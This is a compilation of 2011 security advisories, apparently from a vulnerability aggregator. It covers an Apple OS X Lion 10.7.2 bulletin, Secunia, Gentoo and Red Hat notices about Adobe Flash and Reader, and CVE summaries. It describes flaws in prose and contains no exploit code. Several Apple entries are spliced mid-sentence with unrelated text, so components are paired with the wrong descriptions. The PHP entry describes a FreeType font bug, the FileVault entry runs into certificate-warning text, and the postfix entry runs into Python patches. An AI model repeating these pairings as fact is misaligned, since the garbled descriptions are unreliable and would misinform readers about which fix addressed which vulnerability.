CVE-2011-0231 : Martin Tessarek, Steve Riggins of Geeks R Us, Justin
C. Walker, and Stephen Creswell
CFNetwork
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description: An issue existed in CFNetwork's handling of HTTP
cookies. When accessing a maliciously crafted HTTP or HTTPS URL,
CFNetwork could incorrectly send the cookies for a domain to a server
outside that domain.
CVE-ID
CVE-2011-3246 : Erling Ellingsen of Facebook
CoreFoundation
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted website or e-mail message may
lead to an unexpected application termination or arbitrary code
execution
Description: A memory corruption issue existed in CoreFoundation's
handling of string tokenization. This update addresses the issue through improved bounds
checking.
CVE-ID
CVE-2011-0259 : Apple
CoreMedia
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: Visiting a maliciously crafted website may lead to the
disclosure of video data from another site
Description: A cross-origin issue existed in CoreMedia's handling of
cross-site redirects. This issue is addressed through improved origin
tracking.
CVE-ID
CVE-2011-0187 : Nirankush Panchbhai and Microsoft Vulnerability
Research (MSVR)
CoreMedia
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in the
handling of QuickTime movie files.
CVE-ID
CVE-2011-0224 : Apple
CoreProcesses
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: A person with physical access to a system may partially
bypass the screen lock
Description: A system window, such as a VPN password prompt, that
appeared while the screen was locked may have accepted keystrokes
while the screen was locked. This issue is addressed by preventing
system windows from requesting keystrokes while the screen is locked.
CVE-ID
CVE-2011-0260 : Clint Tseng of the University of Washington, Michael
Kobb, and Adam Kemp
CoreStorage
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: Converting to FileVault does not erase all existing data
Description: After enabling FileVault, approximately 250MB at the
start of the volume was left unencrypted on the disk in an unused
area. Only data which was present on the volume before FileVault was
enabled was left unencrypted. This issue is addressed by erasing this
area when enabling FileVault, and on the first use of an encrypted
volume affected by this issue. If the server presented a certificate chain that could
not be automatically verified, a warning was displayed and the
connection was closed. If the user clicked the "Continue" button in
the warning dialog, any certificate was accepted on the following
connection to that server. An attacker in a privileged network
position may have manipulated the connection to obtain sensitive
information or take action on the server on the user's behalf. This
update addresses the issue by validating that the certificate
received on the second connection is the same certificate originally
presented to the user. When a password is required to wake from
sleep, a person with physical access may be able to access the system
without entering a password if the system is in display sleep mode.
This update addresses the issue by ensuring that the lock screen is
correctly activated in display sleep mode.
CVE-ID
CVE-2011-3214 : Apple
iChat Server
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1
Impact: A remote attacker may cause the Jabber server to consume
system resources disproportionately
Description: An issue existed in the handling of XML external
entities in jabberd2, a server for the Extensible Messaging and
Presence Protocol (XMPP). jabberd2 expands external entities in
incoming requests. This allows an attacker to consume system
resources very quickly, denying service to legitimate users of the
server. This update addresses the issue by disabling entity expansion
in incoming requests.
CVE-ID
CVE-2011-1755
Kernel
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: A person with physical access may be able to access the
user's password
Description: A logic error in the kernel's DMA protection permitted
firewire DMA at loginwindow, boot, and shutdown, although not at
screen lock. This update addresses the issue by preventing firewire
DMA at all states where the user is not logged in.
CVE-ID
CVE-2011-3215 : Passware, Inc.
Kernel
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: An unprivileged user may be able to delete another user's
files in a shared directory
Description: A logic error existed in the kernel's handling of file
deletions in directories with the sticky bit.
CVE-ID
CVE-2011-3216 : Gordon Davisson of Crywolf, Linc Davis, R. Dormer,
and Allan Schmid and Oliver Jeckel of brainworks Training
libsecurity
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: Viewing a maliciously crafted website or e-mail message may
lead to an unexpected application termination or arbitrary code
execution
Description: An error handling issue existed when parsing a
nonstandard certificate revocation list extension. These issues are addressed by improved encoding of characters
in HTML output. Further information is available via the Mailman site
at http://mail.python.org/pipermail/mailman-
announce/2011-February/000158.html This issue does not affect OS X
Lion systems.
CVE-ID
CVE-2011-0707
MediaKit
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Opening a maliciously crafted disk image may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in the
handling of disk images.
CVE-ID
CVE-2011-3217 : Apple
Open Directory
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: Any user may read another local user's password data
Description: An access control issue existed in Open Directory.
CVE-ID
CVE-2011-3435 : Arek Dreyer of Dreyer Network Consultants, Inc, and
Patrick Dunstan at defenseindepth.net
Open Directory
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: An authenticated user may change that account's password
without providing the current password
Description: An access control issue existed in Open Directory.
CVE-ID
CVE-2011-3436 : Patrick Dunstan at defenceindepth.net
Open Directory
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: A user may be able to log in without a password
Description: When Open Directory is bound to an LDAPv3 server using
RFC2307 or custom mappings, such that there is no
AuthenticationAuthority attribute for a user, an LDAP user may be
allowed to log in without a password.
CVE-ID
CVE-2011-3226 : Jeffry Strunk of The University of Texas at Austin,
Steven Eppler of Colorado Mesa University, Hugh Cole-Baker, and
Frederic Metoz of Institut de Biologie Structurale
PHP
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in FreeType's handling of
Type 1 fonts. This issue is addressed by updating FreeType to version
2.4.6. Further
information is available via the PHP website at http://www.php.net/
CVE-ID
CVE-2010-3436
CVE-2010-4645
CVE-2011-0420
CVE-2011-0421
CVE-2011-0708
CVE-2011-1092
CVE-2011-1153
CVE-2011-1466
CVE-2011-1467
CVE-2011-1468
CVE-2011-1469
CVE-2011-1470
CVE-2011-1471
postfix
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: An attacker in a privileged network position may manipulate
mail sessions, resulting in the disclosure of sensitive information
Description: A logic issue existed in Postfix in the handling of the
STARTTLS command. After receiving a STARTTLS command, Postfix may
process other plain-text commands. An attacker in a privileged
network position may manipulate the mail session to obtain sensitive
information from the encrypted traffic. This update addresses the
issue by clearing the command queue after processing a STARTTLS
command. This update
addresses the issues by applying patches from the python project.
Further information is available via the python site at
http://www.python.org/download/releases/
CVE-ID
CVE-2010-1634
CVE-2010-2089
CVE-2011-1521
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in
QuickTime's handling of movie files.
CVE-ID
CVE-2011-3228 : Apple
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in the handling of STSC
atoms in QuickTime movie files.
CVE-ID
CVE-2011-0249 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero
Day Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in the handling of STSS
atoms in QuickTime movie files.
CVE-ID
CVE-2011-0250 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero
Day Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in the handling of STSZ
atoms in QuickTime movie files.
CVE-ID
CVE-2011-0251 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero
Day Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in the handling of STTS
atoms in QuickTime movie files.
CVE-ID
CVE-2011-0252 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero
Day Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: An attacker in a privileged network position may inject
script in the local domain when viewing template HTML
Description: A cross-site scripting issue existed in QuickTime
Player's "Save for Web" export. The template HTML files generated by
this feature referenced a script file from a non-encrypted origin. An
attacker in a privileged network position may be able to inject
malicious scripts in the local domain if the user views a template
file locally. This issue is resolved by removing the reference to an
online script.
CVE-ID
CVE-2011-3218 : Aaron Sigel of vtty.com
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in QuickTime's handling of
H.264 encoded movie files.
CVE-ID
CVE-2011-3219 : Damian Put working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1
Impact: Viewing a maliciously crafted movie file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
QuickTime's handling of URL data handlers within movie files.
CVE-ID
CVE-2011-3220 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An implementation issue existed in QuickTime's handling
of the atom hierarchy within a movie file.
CVE-ID
CVE-2011-3221 : an anonymous researcher working with TippingPoint's
Zero Day Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1
Impact: Viewing a maliciously crafted FlashPix file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in QuickTime's handling of
FlashPix files.
CVE-ID
CVE-2011-3222 : Damian Put working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in QuickTime's handling of
FLIC files.
CVE-ID
CVE-2011-3223 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero
Day Initiative
SMB File Server
Available for: OS X Lion v10.7 and v10.7.1,
OS X Lion Server v10.7 and v10.7.1
Impact: A guest user may browse shared folders
Description: An access control issue existed in the SMB File Server.
Disallowing guest access to the share point record for a folder
prevented the '_unknown' user from browsing the share point but not
guests (user 'nobody'). This issue is addressed by applying the
access control to the guest user. Further information is
available via the Tomcat site at http://tomcat.apache.org/
CVE-ID
CVE-2010-1157
CVE-2010-2227
CVE-2010-3718
CVE-2010-4172
CVE-2011-0013
CVE-2011-0534
User Documentation
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: An attacker in a privileged network position may manipulate
App Store help content, leading to arbitrary code execution
Description: App Store help content was updated over HTTP. This
update addresses the issue by updating App Store help content over
HTTPS.
CVE-ID
CVE-2011-3224 : Aaron Sigel of vtty.com
Web Server
Available for: Mac OS X Server v10.6.8
Impact: Clients may be unable to access web services that require
digest authentication
Description: An issue in the handling of HTTP Digest authentication
was addressed. Users may be denied access to the server's resources,
when the server configuration should have allowed the access. This
issue does not represent a security risk, and was addressed to
facilitate the use of stronger authentication mechanisms. Further information is
available via the libpng website at
http://www.libpng.org/pub/png/libpng.html
CVE-ID
CVE-2011-2690
CVE-2011-2691
CVE-2011-2692
OS X Lion v10.7.2 also includes Safari 5.1.1. For information on
the security content of Safari 5.1.1, please visit:
http://support.apple.com/kb/HT5000
OS X Lion v10.7.2 and Security Update 2011-006 may be obtained from
the Software Update pane in System Preferences, or Apple's Software
Downloads web site:
http://www.apple.com/support/downloads/
The Software Update utility will present the update that applies
to your system configuration.
For OS X Lion v10.7.1
The download file is named: MacOSXUpd10.7.2.dmg
Its SHA-1 digest is: 37f784e08d4461e83a891a7f8b8af24c2ceb8229
For OS X Lion v10.7
The download file is named: MacOSXUpdCombo10.7.2.dmg
Its SHA-1 digest is: accd06d610af57df24f62ce7af261395944620eb
For OS X Lion Server v10.7.1
The download file is named: MacOSXServerUpd10.7.2.dmg
Its SHA-1 digest is: e4084bf1dfa295a42f619224d149e515317955da
For OS X Lion Server v10.7
The download file is named: MacOSXServerUpdCombo10.7.2.dmg
Its SHA-1 digest is: 25e86f5cf97b6644c7a025230431b1992962ec4a
For Mac OS X v10.6.8
The download file is named: SecUpd2011-006Snow.dmg
Its SHA-1 digest is: 0f9c29610a06370d0c85a4c92dc278a48ba17a84
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2011-006.dmg
Its SHA-1 digest is: 12de3732710bb03059f93527189d221c97ef8a06
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.16 (Darwin)
iQEcBAEBAgAGBQJOlc/zAAoJEGnF2JsdZQeeWFcH/RDHS+dCP8T4a92uYRIbs9T3
TFbT7hnOoTB0H+2eN3oziLNime2N4mO921heHobiAKSXv/luU41ZPHxVd6rE77Md
/BHDqLv65RA0XFTIPmrTcfpLhI5UgXDLfOLrsmdwTm52l5zQZkoxufYFf3mB3h7U
ZJUD1s081Pjy45/Cbao097+JrDwS7ahhgkvTmpmSvJK/wWRz4JtZkvIYcQ2uQFR4
sTg4l6pmi3d8sJJ4wzrEaxDpclRjvjURI4DiBMYwGAXeCMRgYi0y03tYtkjXoaSG
69h2yD8EXQBuJkDyouak7/M/eMwUfb2S6o1HyXTldjdvFBFvvwvl+Y3xp8YmDzU=
=gsvn
-----END PGP SIGNATURE-----
VAR-201109-0117 | CVE-2011-3422 | Apple Mac OS X of Keychain Any in the implementation of SSL Vulnerability impersonating a server |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The Keychain implementation in Apple Mac OS X 10.6.8 and earlier does not properly handle an untrusted attribute of a Certification Authority certificate, which makes it easier for man-in-the-middle attackers to spoof arbitrary SSL servers via an Extended Validation certificate, as demonstrated by https access with Safari. Apple Mac OS X is prone to a security-bypass vulnerability in the Certificate Trust Policy.
An attacker can exploit this issue to bypass the KeyChain security settings.
Mac OS X 10.6.8 and prior are vulnerable
VAR-201109-0155 | CVE-2011-2444 | Adobe Flash Player Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, related to a "universal cross-site scripting issue," as exploited in the wild in September 2011.
An attacker can exploit this issue by enticing an unsuspecting victim into visiting a malicious website.
An attacker can leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of an arbitrary website. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks. The product enables viewing of applications, content and video across screens and browsers. Remote attackers can inject arbitrary web scripts or HTML via specially crafted URLs. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Adobe Flash Player Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA46113
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46113/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46113
RELEASE DATE:
2011-09-22
DISCUSS ADVISORY:
http://secunia.com/advisories/46113/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46113/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46113
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Flash Player,
which can be exploited by malicious people to conduct cross-site
scripting attacks, bypass certain security restrictions, and
compromise a user's system.
1) Certain unspecified input is not properly sanitised before being
returned to the user.
NOTE: This vulnerability is reportedly being actively exploited in
targeted attacks.
2) An error within the ActionScript Virtual Machine 2 (AVM2) when
handling a certain function parameters can be exploited to cause a
stack-based buffer overflow.
3) An error within the ActionScript Virtual Machine (AVM) can be
exploited to cause a stack-based buffer overflow.
4) A logic error can be exploited to corrupt memory.
5) An unspecified error can be exploited to bypass the security
control and e.g. disclose certain sensitive information.
6) A logic error when streaming certain media can be exploited to
corrupt memory.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported as a 0-day. The vendor additionally credits Google.
2) Bing Liu, Fortinet's FortiGuard Labs.
The vendor credits:
3) Yang Dingning, NCNIPC, Graduate University of Chinese Academy of
Sciences.
5) Neil Bergman, Cigital.
6) Zrong, zengrong.net.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb11-26.html
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-32.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
For more information:
SA44558
SA44574
SA44846
SA44964
SA45232
SA45583
SA45583
SA45621
SA45748
SA45978
SA46113
SA46512
SA46887
SA47001
SA47012
SA47611
The vulnerabilities are reported in versions 73.C0.41 and 73.B3.61. Please see the vendor's advisory for more details.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
